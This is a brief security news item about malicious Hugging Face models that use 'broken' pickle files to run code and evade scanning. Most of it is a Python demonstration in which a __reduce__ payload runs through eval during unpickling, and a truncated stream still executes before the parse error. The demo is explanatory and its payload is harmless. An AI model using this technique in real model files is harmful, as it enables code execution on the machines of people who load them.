CyberSecurity updates
2025-02-23 16:20:32 Pacific

Malicious ML Models on Hugging Face Exploit Pickle Format

Researchers have identified malicious machine learning (ML) models on Hugging Face that use a novel technique involving 'broken' pickle files to evade detection. The attack, dubbed 'nullifAI', abuses Python's pickle serialization format, which permits arbitrary code execution while an ML model is being deserialized. The malicious models were not initially flagged as unsafe by Hugging Face's security mechanisms.
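To illustrate the underlying weakness, here is a minimal sketch of why unpickling untrusted data is dangerous, and why even a deliberately corrupted pickle stream still executes its payload before the parser fails. The `Payload` class and the marker file are hypothetical demo constructs, not artifacts from the actual campaign; a real attacker would invoke something like `os.system` instead of the harmless `eval` expression used here.

```python
import os
import pickle
import tempfile

# A marker file lets us observe that code ran during deserialization.
marker = os.path.join(tempfile.mkdtemp(), "pickle_demo_marker")

class Payload:
    """Any object can name an arbitrary callable to run at unpickle time."""
    def __reduce__(self):
        # pickle stores `eval` by name plus its argument; pickle.loads
        # then calls eval(expression) on the *loading* machine.
        return (eval, (f"open({marker!r}, 'w').write('ran')",))

blob = pickle.dumps(Payload(), protocol=0)

# The 'broken pickle' angle: corrupt the stream *after* the payload
# opcode. Loading raises an error, but pickle executes opcodes
# sequentially, so the payload has already run by then.
try:
    pickle.loads(blob[:-1])  # drop the trailing STOP opcode
except Exception:
    pass  # stream is malformed, yet the side effect already fired

print(os.path.exists(marker))  # True: eval ran before the parse error
```

Because execution happens opcode by opcode, a scanner that rejects the file as unparseable can still be bypassed: the file is "broken" only after the malicious opcodes have been laid down.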